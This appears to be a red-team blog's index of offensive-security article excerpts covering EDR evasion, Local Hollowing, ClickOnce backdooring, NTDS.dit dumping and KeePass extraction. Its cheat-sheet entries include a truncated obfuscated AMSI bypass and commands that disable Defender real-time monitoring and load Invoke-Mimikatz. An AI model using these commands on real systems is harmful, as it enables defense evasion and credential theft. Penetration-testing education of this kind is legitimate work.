First Driver Development
Introduction: To truly control a Windows system, you must operate at Ring 0, i.e., the kernel. The problem is that from user mode (Ring 3), you cannot interact directly with Ring 0, so it is impossible to modify the kernel’s internal structures, disable an EDR’s monitoring mechanisms, or manipulate process protections. Tools like WinDbg allow you to explore and modify kernel memory, but they are not viable in production environments: WinDbg requires a reboot to enable debug mode, a second machi...
ClickOnce Hijacking
Introduction: ClickOnce is a Microsoft deployment technology built into the .NET Framework. It allows Windows applications to be distributed via a simple URL: the user clicks a link, and the application downloads, installs, and runs with very little user interaction. The idea is not to create a malicious application from scratch, but to backdoor an existing legitimate ClickOnce application and redeploy it. The application retains its normal behavior but executes arbitrary code upon launch. Sev...
CLR Loading
Introduction: The previous article on Local Hollowing addressed the issue of loading native PEs into memory. The encrypted payload is decrypted, manually mapped section by section, relocations are corrected, imports are resolved, and then the main thread is redirected to the entry point. This approach works because a native PE contains machine instructions that the CPU can understand directly. Therefore, it is sufficient to place the bytes in the correct location in memory and have the RIP poin...
Bypassing static detection
Introduction: In a previous article, we detailed how Local Hollowing works, a technique that allows a malicious PE file to be executed in memory without ever writing it in plaintext to the disk. The loader is compiled using OLLVM to obfuscate the machine code, and the payload (Mimikatz) is encrypted with AES-256. In theory, this combination should be sufficient to bypass static detection. In practice, Microsoft Defender detects the loader immediately: the MTB (Machine Learning Based Threat) suffi...
Local Hollowing
Introduction: During Red Team exercises, once initial access has been gained, one of the first obstacles is static detection. Deploying tools like Mimikatz to the disk is immediately detected by EDR because the signatures for these tools have long been known to EDR systems. Local Hollowing allows you to bypass this problem. The principle: a loader embeds the malicious PE (Portable Executable) encrypted with AES-256, decrypts it in memory at runtime, manually maps it to replace the Windows loade...
CRTP CheatSheet
Bypass / AMSI Bypass: Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) (Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'...
NTDS Base
Introduction: The NTDS.dit file is the Active Directory database, which contains data on all domain accounts, group membership relationships, and domain user password hashes. The retrieval of this file by an attacker is equivalent to the total compromise of the domain, as it means that the attacker has compromised the domain controller. In fact, this file is stored only on domain controllers and does not exist on other machines in the domain. How the NTDS dump works / 2.1 Location: The default file p...
KeeFarce Reborn
1. Introduction: KeeFarce Reborn is an offensive tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine. It is based on the work of several well-known projects: KeeFarce (extraction via DLL and ClrMD injection), KeeThief (master key recovery), and KeePassHax (decryption via reflection). The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible. 2. How it works: The tool takes t...
Mimikatz CheatSheet
Environment preparation / Run as administrator: Start-Process PowerShell_ISE -Verb RunAs ; Add-MpPreference -ExclusionPath "C:\Temp" ; Set-MpPreference -DisableRealtimeMonitoring $true ; Import-Module C:\Temp\Invoke-Mimikatz.ps1 . If Windows Defender cannot be disabled, perform an AMSI bypass: S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`...
Wmiexec
As part of internal penetration testing in Active Directory environments, it is often necessary to execute remote commands on Windows machines. Several tools are available for this purpose, but one of the most widely used is wmiexec. The general principle of wmiexec: wmiexec lets you execute remote commands without copying files or creating services on the target machine. It is based on WMI (Windows Management Instrumentation), a native Windows technology for controlling a local or remote sy...